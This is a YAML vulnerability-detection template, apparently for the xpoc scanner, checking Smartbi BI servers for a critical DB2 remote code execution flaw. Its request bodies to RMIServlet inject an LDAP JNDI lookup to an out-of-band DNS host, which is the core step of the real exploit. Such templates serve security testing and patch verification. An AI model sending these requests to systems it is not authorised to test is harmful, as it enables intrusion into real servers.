expression: (r1() && r2()) || (r3() && r4())
id: smartbi-db2-biconfigservice-rce
info:
    author: xpoc
    created: 2023/06/22
    description: |
        Fofa: app="SMARTBI"
    name: Smartbi DB2 RCE
    reference:
        - https://www.smartbi.com.cn/patchinfo
    severity: critical
    solutions: smartbi 小于v10.5.8(20221125)版本（之前版本打patch.2022-11-22补丁也不行）存在db2命令执行漏洞
    tags:
        - smartbi
        - Eserv
        - Servlet
        - eserv
    verified: true
rules:
    r1:
        expression: response.status == 200 && response.body.ibcontains(bytes("stackTrace")) && !response.body.ibcontains(bytes("CLIENT_USER_NOT_LOGIN")) && !response.body.ibcontains(bytes("会存在RCE的安全漏洞"))
        request:
            body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688",":clientRerouteServerListJNDIName=","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
            method: POST
            path: /smartbi/vision/RMIServlet
    r2:
        expression: oobCheck(oob, oob.ProtocolDNS, 3)
        request:
            body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688","BLUDB:clientRerouteServerListJNDIName=ldap://{{oobDNS}}","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
            method: POST
            path: /smartbi/vision/RMIServlet
    r3:
        expression: response.status == 200 && response.body.ibcontains(bytes("stackTrace")) && !response.body.ibcontains(bytes("CLIENT_USER_NOT_LOGIN")) && !response.body.ibcontains(bytes("会存在RCE的安全漏洞"))
        request:
            body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688",":clientRerouteServerListJNDIName=","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
            method: POST
            path: /vision/RMIServlet
    r4:
        expression: oobCheck(oob, oob.ProtocolDNS, 3)
        request:
            body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688","BLUDB:clientRerouteServerListJNDIName=ldap://{{oobDNS}}","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
            method: POST
            path: /vision/RMIServlet
set:
    oob: oob()
    oobDNS: oob.DNS
